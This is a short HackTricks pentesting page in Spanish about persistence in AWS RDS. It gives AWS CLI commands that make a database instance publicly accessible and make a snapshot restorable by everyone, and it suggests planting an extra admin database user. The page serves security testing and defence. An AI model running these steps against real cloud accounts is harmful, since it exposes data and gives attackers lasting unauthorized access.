AWS - RDS Persistence

Support HackTricks

RDS

Para más información, consulta:

Hacer que la instancia sea accesible públicamente: rds:ModifyDBInstance

Un atacante con este permiso puede modificar una instancia RDS existente para habilitar la accesibilidad pública.

aws rds modify-db-instance --db-instance-identifier target-instance --publicly-accessible --apply-immediately

Crear un usuario administrador dentro de la DB

Un atacante podría crear un usuario dentro de la DB para que, incluso si se modifica la contraseña del usuario maestro, no pierda el acceso a la base de datos.

Hacer la instantánea pública

aws rds modify-db-snapshot-attribute --db-snapshot-identifier <snapshot-name> --attribute-name restore --values-to-add all
Apoya a HackTricks

Last updated